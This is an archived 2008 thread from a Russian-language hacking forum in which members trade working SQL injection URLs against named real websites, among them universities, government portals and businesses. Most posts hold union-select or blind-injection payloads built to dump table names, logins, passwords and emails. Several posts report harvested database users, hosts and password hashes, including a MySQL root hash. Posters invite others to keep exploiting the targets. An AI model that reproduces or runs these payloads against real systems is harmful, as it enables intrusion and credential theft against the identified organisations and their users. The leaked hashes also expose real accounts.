ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.08.2008, 09:46
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Сообщение от Cowcanfly
Помогите с http://la2s.a42.ru/index.php?d=library/news&p=comments&newsid=-1'+union+select+1,2,3,table_name+from+information_ schema.tables+limit+1,1/*
Названия таблиц выводятся, но при попытке вывести данные
http://la2s.a42.ru/index.php?d=library/news&p=comments&newsid=-1%27+union+select+1,2,3,concat_ws(0x3a,name,member _login_key)+from+ibf_members+limit+0,1/*
автоматически добавляет site.news к названию таблицы, и пишет что такой то таблицы нету
+from+forum.ibf_members
|
|
|
06.08.2008, 13:27
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
Обед подан...еда! =) PR6
http://extension.oregonstate.edu/people/employeeSearch/employeeDetail.php?E_num=-786+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+E mployees/*
User:extdbadmin@web3.cws.oregonstate.edu
Dbname:cw_61034_extwebdata
Version:4.1.11-Debian_4sarge7-log
легкий брут не дал резалта..
Соседей: 149  |
|
|
|
06.08.2008, 19:03
|
|
Новичок
Регистрация: 26.11.2007
Сообщений: 6
Провел на форуме:
80047
Репутация:
5
|
|
Знакомтесь
Код:
http://lotussoft.com.ua
ребята делают сайты, в портфолио сайты сделанные в 2005 году многие уязвимы, хз может и остальные тоже =)
Последний раз редактировалось Buddah; 06.08.2008 в 19:06..
|
|
|
|
06.08.2008, 20:53
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Nbfet.gov.cn - PR 5
http://www.nbfet.gov.cn/sub/leader-introduce.php?id=-8%20union%20select%201,2,unhex(hex(version()))/*
Wagrowiec.um.gov.pl - PR 4
http://www.wagrowiec.um.gov.pl/info/aktualnosci/tresc.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10/*
4 ветка
http://www.wagrowiec.um.gov.pl/info/aktualnosci/tresc.php?id=-1+union+select+1,login,password,4,5,6,7,8,9,10+fro m+users/*
должны быть юзеры..
Ipirangadonorte.mt.gov.br
http://www.ipirangadonorte.mt.gov.br/home.php?pg=gabinete&id=-1+union+select+1,table_name,3,4,5+from+information _schema.tables+limit+18,1--
5 ветка..
http://www.ipirangadonorte.mt.gov.br/home.php?pg=gabinete&id=-1+union+select+1,login,senha,4,5+from+admuser--
/adm
Cnunirea.licee.edu.ro
http://cnunirea.licee.edu.ro/continut/art.php?slang=ro&id=-15'+union+select+1,version(),id+from+users/*
Students.ee.sun.ac.za
http://students.ee.sun.ac.za/~aresazi/eendragweb/hk.php?id=-1+union+select+1,2,table_schema,4,table_name,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ information_schema.tables+limit+16,1/*
5 ветка, таблы..
http://students.ee.sun.ac.za/~aresazi/eendragweb/hk.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,username,use r_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23+from+phpbb_users+where+user_level=1/*
сам форум не нашел (
http://students.ee.sun.ac.za/~aresazi/eendragweb/hk.php?id=-1+union+select+1,2,password,4,user,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23+from+aresazi.ae _users/*
юзеры..
News.ogel.dk
http://news.ogel.dk/index.php?id=-38+union+select+1,2,mail,4,5,6,7,8,9,10,11,version (),13,14+from+users
Grainedepastel-uk.com
http://www.grainedepastel-uk.com/categorie.php?id=-1+union+select+all+1,2,3,4,5,table_name+from+infor mation_schema.tables+limit+16,1/*
5 ver. tables..
http://www.grainedepastel-uk.com/categorie.php?id=-1+union+select+all+1,2,3,4,5,concat_ws(0x3a,mail,p assword)+from+grainedegbaseuk.b_clients/*
/dejainscrit.php?prov=index
Последний раз редактировалось sabe; 08.08.2008 в 08:10..
|
|
|
|
06.08.2008, 23:23
|
|
Участник форума
Регистрация: 01.03.2006
Сообщений: 169
Провел на форуме:
519496
Репутация:
78
|
|
Сайт: www.fergusonhill.co.uk PR=4
http://www.fergusonhill.co.uk/product_details.php?id=7+union+select+1,2,3,4,5,6, 7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,7 2,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*
Версия БД 4.1.22-standard
Есть таблица users
|
|
|
|
07.08.2008, 01:23
|
|
Новичок
Регистрация: 21.08.2005
Сообщений: 3
Провел на форуме:
24571
Репутация:
0
|
|
http://www.kalyx.com/store/insertorderalt.cfm?ItemID=1%20or%201=(SELECT+TOP+1 +table_name+FROM+information_schema.tables)--
dont get countinue  |
|
|
|
07.08.2008, 02:03
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
http://www.anavasi.gr PR 4
version()=5.0.51a-community
user()=anavasi_ana@localhost
database()=anavasi_ana
http://www.anavasi.gr/en/gpsp.php?id=-24+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a,version(),user(),database()),14,15,16,17
http://www.aab.org.uk PR 6
blind sql
version=3
http://www.aab.org.uk/contentok.php?id=69+and+3=substring(version(),1,1) &basket=wwsshowconfdets
http://www.copmed.org.uk PR 5
version=4
http://www.copmed.org.uk/page.php?id=25+and+4=substring(version(),1,1)/*
http://www.zenithcafe.co.uk PR 2
version=5
не смог подобрать кол-во полей...
http://www.zenithcafe.co.uk/artists_profile.php?id=2+and+5=substring(version() ,1,1)--
http://wedc.lboro.ac.uk PR 6
version=5
читать файлики нельзя 
http://wedc.lboro.ac.uk/projects/new_projects3.php?id=60+union+select+1,2,concat_ws (0x3a,version(),user(),database()),4,5,6,7
Последний раз редактировалось MirA; 07.08.2008 в 02:17..
|
|
|
|
07.08.2008, 12:14
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
Люди есть у кого нибуть сайт где можно слово в hex число перевести! А то был оди хороший сайт http://hack-shop.org.ru/tools-code-encode но его жестоко засрали какойто х*йней ! В инете чтото ваще непонятное!!! (ПРИМЕР:Перевести допустим card_user (переводил на хак-туле - бывшем) получалось 0x636172645f75736572 ! ОЧ нужен почти такой же сайт!!!))Ну или чото типа того приписать 0x не сложно)
|
|
|
|
07.08.2008, 16:24
|
|
Новичок
Регистрация: 21.06.2008
Сообщений: 17
Провел на форуме:
153953
Репутация:
18
|
|
http://k0x.ru/encoder/index.php
|
|
|
|
07.08.2008, 17:57
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
Полдник..=)
http://acad.coloradocollege.edu/dept/EN/cover.php?block=6[SQL]&year='2008'&type=feature
1,2,3,4,5,6,7,8
Dbname:journalism
User:journalism@web1.coloradocollege.edu
Version:5.0.45
=============================================
Эта есть в антибояне, но мож кто-то захочет ковырнуть еще раз.
http://www.mrc.uidaho.edu/mrc/team/printPeople.php?ID=-470[SQL]
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30
version:4.0.20-debug-debug
Dbname:mrc
User:smit7692@pulvinar.mrc.uidaho.edu
mysql.user
user  assword
root:630e00ee259d2812
login
password
3b2e08769d8a337d7618ac02e9ea2401:050600
b553c653dc67be2a267d2dca9b1a88db
=============================================
Последний раз редактировалось $n@ke; 07.08.2008 в 18:01..
Причина: АнтибоЙАн
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
